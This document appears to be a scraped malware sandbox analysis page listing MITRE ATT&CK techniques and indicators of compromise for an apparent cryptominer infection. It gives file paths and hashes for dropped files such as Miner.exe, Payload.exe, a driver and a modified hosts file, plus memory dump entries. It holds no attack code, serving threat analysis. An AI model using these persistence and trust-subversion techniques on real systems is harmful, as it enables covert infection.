Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe

Filesize
384KB

MD5
0379a352de562d7bad84b46a4b992a62

SHA1
ce602bf491af57018c2efeaafc234c6726614d4e

SHA256
80cb608001a9e2466fa486802fbcf7dc52e07cf89f22353836894c887ff00736

SHA512
dd63e4bcd99d8d76418a75e2787a6db11cb734c5d27d0f0c5e3402651336d3f7f6ad3b20e101eb13a6bd8c50c49795b0286e747deb2b21e541a17b04f84659f3

Download Submit
C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe

Filesize
1.8MB

MD5
464cd3cca1f63443d7533abc298b39f0

SHA1
57163151753ab3772f3b987d7306c6618cb90fcf

SHA256
cd0aa494395a33007cd57a9301c9ed46cc65a241cd8957bd818f2e57f723c053

SHA512
908f44ada6bb3ae3d3e48672bc1e6eaf7c6b0f0c911190310bd0e28170074a8ab2c6792cfdb8bad51e8b887e4f0fdbe5ad0ba0c856c1cb90490d8f9c5980c80f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
84fdae32cffe1c8330dabd18f6882caf

SHA1
8f3b55b476dc4aadbc146a527a61abf6e06fb0a1

SHA256
bfa60caf3b77ba5a6e266d4da9088dd34c29c71093d223f61712845fa065f8fd

SHA512
c16f2bf7317b164de45624b550924f0c714dafeea10c5f069cc295c19d1afc2a2728646199a1d1ac11f622ac238067d283cc97b22b78965074e71a9deed1b110

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1C9A.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8485d873028260acddbbd09214446ddf

SHA1
dfa116063bdbafacb21fea580f3d5cf4a8657579

SHA256
105b7596701d8a38d557944846743fd8190a426178eb223edd0eedd968ecb9dd

SHA512
3d57eebc37e44ef73c5333120b61df804fecc88f6e876c844c2054b46e52e493a0042716d2e045833fa0510610ad67e68f9c7dee45b9429987dbd0e529d91104

Download Submit
C:\Users\Admin\AppData\Roaming\Miner.exe

Filesize
1.1MB

MD5
a8fdeccbd2d07c18151b2e39fdf37fc3

SHA1
81d92fdaa6611372c3ba210a8e35b312af724f53

SHA256
ff62f0188d7c84a20c884f0afa5f9f416534b188e55e6cede8d8c462b656766e

SHA512
98c992192edcb318e271ba0039f025e19dde6e0b86177db9e1722b2912ccc88ee816201619b57b8c0c7e09259b34e7bf65e6d3c975902606c309911a7864bcf2

Download Submit
C:\Users\Admin\AppData\Roaming\Miner.exe

Filesize
896KB

MD5
204522719bb482c2f64760a9df2bd728

SHA1
6f5fe82ad904b6201ef856535f7f81ceda0d05d6

SHA256
130ade95da6ade5d0e3b1c61003b43c419b289c3bef84e2357fa4bd412f5dbd0

SHA512
3c692e76a23127ea87bc40e43f658396a9d73a9d0e739f5e0316df9582a80cecd76f7a7c940e3c9d434f9985ae578deb4364c0a049eae4e0a120785c3143157a

Download Submit
C:\Users\Admin\AppData\Roaming\Miner.exe

Filesize
1.2MB

MD5
bc0d111c047773736b6b06c0c2614548

SHA1
4e7a24a227a2cd876517b48ab7864bd6b519cf46

SHA256
b60ca54b0af6c1cd9e7d1b3bd96c7edd9d66716fe78468bfbeaf490823f48350

SHA512
b761fc546c5ea7dcb73bdbdfc2708fb0c5f3723de1d5a75b07c4fad16e422e35f649999ad80bee9ad6a14c6a5865921975e8d7ba48c353bbe8dbc66ae3cd508e

Download Submit
C:\Users\Admin\AppData\Roaming\Shortcutter.exe

Filesize
50KB

MD5
4ce8fc5016e97f84dadaf983cca845f2

SHA1
0d6fb5a16442cf393d5658a9f40d2501d8fd725c

SHA256
f4da7f22e8eb28cfd8ecb0c3fdc8923b2ba5c5e96b917cbcf53b6bbed1c22551

SHA512
4adeb4774ca136a085bc92cf6f02aa340f927ae12e1db90e8a2be69ef045611d333904ef5714c876ab03f8bcc52ee0140e724bd1659b9cf9eacf0a7d6a7bdd46

Download Submit
C:\Windows\TEMP\leclojgajjdi.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Windows\build.exe

Filesize
188KB

MD5
ffe5ff4a06e3a7696484bbce8f3ade91

SHA1
af919d9b6b7abef80fb5c85498ffc5ec0c0ae394

SHA256
b256448e3219b2b7033b4c214c78b02db0d4e000f943fc98dffede3d8a6a7cf3

SHA512
bfeb89c2b5e7420d48879d010cfe2f4d587f1d43612fd3ab489988092d11dfd4796a306c5a4b8a6be8b78ebde2e0561bae3ee5e1d4a827aa43db8e13d55cc9a4

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
710d55f3d3ca732fc39af6ffc68981ed

SHA1
f5795ab6843bf05d8b845b854a7fcf566a8a6b41

SHA256
651618095b62236fcd605652b4ee1e92886ffc38d72660149030b25f2ace3306

SHA512
1b8f40d21a3674ec23b67501fb4305d1bdd8cb7c3837d43014585a185e1aa9c3f9405c8429f85f4f76df80ecfc071ad6ac4a85d8581481bd88fd0f8c7e188e54

Download Submit
\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe

Filesize
832KB

MD5
3bc9820db985cb966ed5171fc49af386

SHA1
09f7e22e79f25f3dd698750549a751a56323f5e4

SHA256
e8775dfdd8e1a4ab3a74a082616fca106375a9e0d0f82cf0ab30b4f5d3920f7b

SHA512
2d1cc832a5b70dd0f0c9f4c0c9e6dfc9c77a4f01fd237e5565700fc7204d27bd29520bd04f455b535aa7799b2d709705761e990b1fc92e82377786c704dc13d6

Download Submit
\Users\Admin\AppData\Roaming\Miner.exe

Filesize
1024KB

MD5
929e3f8b4d5db73acc77e64e077a4948

SHA1
927205cb68df900e4576225f53950f0f1510b4b9

SHA256
7ed9c429c30915d89bd7444b0c11791fb80d9d51f94158aa8dfc8c3903101eba

SHA512
3a5c684fb58b033276e187a91a72dda04ce29dd30a3ed8295bdd5cee7823016d5bb5eae63a301c2c37fefa793a4bcc4680959cd250789fa647282e28992b4018

Download Submit
\Users\Admin\AppData\Roaming\Miner.exe

Filesize
1.3MB

MD5
85baa1e562a1d0d883c87737a8390ae7

SHA1
7ca33844e3855a2b4fb616e03a70dd3b886f1fd6

SHA256
7c303c6f3562701117733a12bb209d390c3fdb7c8d4650034abb52e08c731bb3

SHA512
7850df0c147369d8b191796257e3e99700c337bd3377a289a5eebf61335aa72b57a29ef1434501fe508a7358c63f116ac26ca0d95b94ba3ab908fe826a13e472

Download Submit
\Users\Admin\AppData\Roaming\Payload.exe

Filesize
5.3MB

MD5
b59631e064541c8651576128708e50f9

SHA1
7aae996d4990f37a48288fa5f15a7889c3ff49b3

SHA256
4e5fcc788287580ed19402eadaab8c69ca5f0a904ead605153feb534bbe87002

SHA512
571a06f0ec88fe3697388195dd0a7f7e8d63945748855d928fb5005b51fd2c2baea1a63bd871ed0cfade5eabb879f577b7b04f9cd4d1222de52da641feee1f92

Download Submit
memory/436-225-0x0000000000B60000-0x0000000000B84000-memory.dmp

Filesize
144KB

Download
memory/436-297-0x0000000000B90000-0x0000000000BBB000-memory.dmp

Filesize
172KB

Download
memory/436-289-0x0000000000CA0000-0x0000000000CCB000-memory.dmp

Filesize
172KB

Download
memory/436-230-0x000007FEBE860000-0x000007FEBE870000-memory.dmp

Filesize
64KB

Download
memory/436-233-0x0000000037C90000-0x0000000037CA0000-memory.dmp

Filesize
64KB

Download
memory/436-231-0x0000000077CA1000-0x0000000077CA2000-memory.dmp

Filesize
4KB

Download
memory/436-228-0x0000000000B90000-0x0000000000BBB000-memory.dmp

Filesize
172KB

Download
memory/436-224-0x0000000000B60000-0x0000000000B84000-memory.dmp

Filesize
144KB

Download
memory/480-285-0x0000000000240000-0x000000000026B000-memory.dmp

Filesize
172KB

Download
memory/480-306-0x0000000000270000-0x000000000029B000-memory.dmp

Filesize
172KB

Download
memory/480-287-0x000007FEBE860000-0x000007FEBE870000-memory.dmp

Filesize
64KB

Download
memory/480-291-0x0000000000240000-0x000000000026B000-memory.dmp

Filesize
172KB

Download
memory/480-290-0x0000000037C90000-0x0000000037CA0000-memory.dmp

Filesize
64KB

Download
memory/496-311-0x0000000077CA1000-0x0000000077CA2000-memory.dmp

Filesize
4KB

Download
memory/496-310-0x00000000001E0000-0x000000000020B000-memory.dmp

Filesize
172KB

Download
memory/496-305-0x00000000001E0000-0x000000000020B000-memory.dmp

Filesize
172KB

Download
memory/504-323-0x0000000000480000-0x00000000004AB000-memory.dmp

Filesize
172KB

Download
memory/608-335-0x0000000000180000-0x00000000001AB000-memory.dmp

Filesize
172KB

Download
memory/688-363-0x0000000000480000-0x00000000004AB000-memory.dmp

Filesize
172KB

Download
memory/876-359-0x0000000077C50000-0x0000000077DF9000-memory.dmp

Filesize
1.7MB

Download
memory/876-364-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/876-356-0x0000000077C50000-0x0000000077DF9000-memory.dmp

Filesize
1.7MB

Download
memory/876-361-0x0000000037C90000-0x0000000037CA0000-memory.dmp

Filesize
64KB

Download
memory/876-344-0x0000000077C50000-0x0000000077DF9000-memory.dmp

Filesize
1.7MB

Download
memory/876-349-0x0000000077C50000-0x0000000077DF9000-memory.dmp

Filesize
1.7MB

Download
memory/876-352-0x0000000077C50000-0x0000000077DF9000-memory.dmp

Filesize
1.7MB

Download
memory/876-358-0x0000000077C50000-0x0000000077DF9000-memory.dmp

Filesize
1.7MB

Download
memory/876-340-0x00000000000A0000-0x00000000000CB000-memory.dmp

Filesize
172KB

Download
memory/1428-261-0x0000000077A30000-0x0000000077B4F000-memory.dmp

Filesize
1.1MB

Download
memory/1428-259-0x0000000077C50000-0x0000000077DF9000-memory.dmp

Filesize
1.7MB

Download
memory/1468-278-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1468-274-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1468-280-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1468-286-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/1468-281-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1468-294-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1468-273-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1468-275-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1468-276-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1916-243-0x00000000009A0000-0x00000000009A8000-memory.dmp

Filesize
32KB

Download
memory/1916-244-0x00000000015D0000-0x0000000001650000-memory.dmp

Filesize
512KB

Download
memory/1916-248-0x00000000015D0000-0x0000000001650000-memory.dmp

Filesize
512KB

Download
memory/1916-249-0x000007FEECD20000-0x000007FEED6BD000-memory.dmp

Filesize
9.6MB

Download
memory/1916-247-0x00000000015D0000-0x0000000001650000-memory.dmp

Filesize
512KB

Download
memory/1916-246-0x00000000015D0000-0x0000000001650000-memory.dmp

Filesize
512KB

Download
memory/1916-245-0x000007FEECD20000-0x000007FEED6BD000-memory.dmp

Filesize
9.6MB

Download
memory/1916-241-0x0000000019FE0000-0x000000001A2C2000-memory.dmp

Filesize
2.9MB

Download
memory/1916-242-0x000007FEECD20000-0x000007FEED6BD000-memory.dmp

Filesize
9.6MB

Download
memory/2144-219-0x0000000077A30000-0x0000000077B4F000-memory.dmp

Filesize
1.1MB

Download
memory/2144-288-0x0000000077C50000-0x0000000077DF9000-memory.dmp

Filesize
1.7MB

Download
memory/2144-214-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2144-213-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2144-216-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2144-221-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2144-218-0x0000000077C50000-0x0000000077DF9000-memory.dmp

Filesize
1.7MB

Download
memory/2144-212-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2144-211-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2280-260-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2280-263-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2280-267-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2280-262-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2280-272-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2280-257-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2388-37-0x0000000002B70000-0x0000000002BB0000-memory.dmp

Filesize
256KB

Download
memory/2388-38-0x0000000002B70000-0x0000000002BB0000-memory.dmp

Filesize
256KB

Download
memory/2388-36-0x0000000074680000-0x0000000074C2B000-memory.dmp

Filesize
5.7MB

Download
memory/2388-34-0x0000000074680000-0x0000000074C2B000-memory.dmp

Filesize
5.7MB

Download
memory/2388-44-0x0000000002B70000-0x0000000002BB0000-memory.dmp

Filesize
256KB

Download
memory/2388-47-0x0000000074680000-0x0000000074C2B000-memory.dmp

Filesize
5.7MB

Download
memory/2396-204-0x00000000028A0000-0x00000000028A8000-memory.dmp

Filesize
32KB

Download
memory/2396-209-0x000007FEED6C0000-0x000007FEEE05D000-memory.dmp

Filesize
9.6MB

Download
memory/2396-201-0x0000000001F20000-0x0000000001FA0000-memory.dmp

Filesize
512KB

Download
memory/2396-202-0x000000001B400000-0x000000001B6E2000-memory.dmp

Filesize
2.9MB

Download
memory/2396-203-0x000007FEED6C0000-0x000007FEEE05D000-memory.dmp

Filesize
9.6MB

Download
memory/2396-205-0x000007FEED6C0000-0x000007FEEE05D000-memory.dmp

Filesize
9.6MB

Download
memory/2396-206-0x0000000001F20000-0x0000000001FA0000-memory.dmp

Filesize
512KB

Download
memory/2396-208-0x0000000001F20000-0x0000000001FA0000-memory.dmp

Filesize
512KB

Download
memory/2552-41-0x0000000003000000-0x0000000003040000-memory.dmp

Filesize
256KB

Download
memory/2552-46-0x0000000074680000-0x0000000074C2B000-memory.dmp

Filesize
5.7MB

Download
memory/2552-39-0x0000000074680000-0x0000000074C2B000-memory.dmp

Filesize
5.7MB

Download
memory/2552-40-0x0000000074680000-0x0000000074C2B000-memory.dmp

Filesize
5.7MB

Download
memory/2552-42-0x0000000003000000-0x0000000003040000-memory.dmp

Filesize
256KB

Download
memory/2604-45-0x000000001AEC0000-0x000000001AF40000-memory.dmp

Filesize
512KB

Download
memory/2604-43-0x000007FEF5F70000-0x000007FEF695C000-memory.dmp

Filesize
9.9MB

Download
memory/2604-220-0x000000001AEC0000-0x000000001AF40000-memory.dmp

Filesize
512KB

Download
memory/2604-207-0x000007FEF5F70000-0x000007FEF695C000-memory.dmp

Filesize
9.9MB

Download
memory/2604-35-0x0000000000F30000-0x0000000000F42000-memory.dmp

Filesize
72KB

Download
memory/3060-301-0x000007FEED6C0000-0x000007FEEE05D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-304-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/3060-299-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/3060-319-0x000007FEED6C0000-0x000007FEEE05D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-303-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/3060-298-0x000007FEED6C0000-0x000007FEEE05D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-321-0x0000000000DBB000-0x0000000000E22000-memory.dmp

Filesize
412KB

Download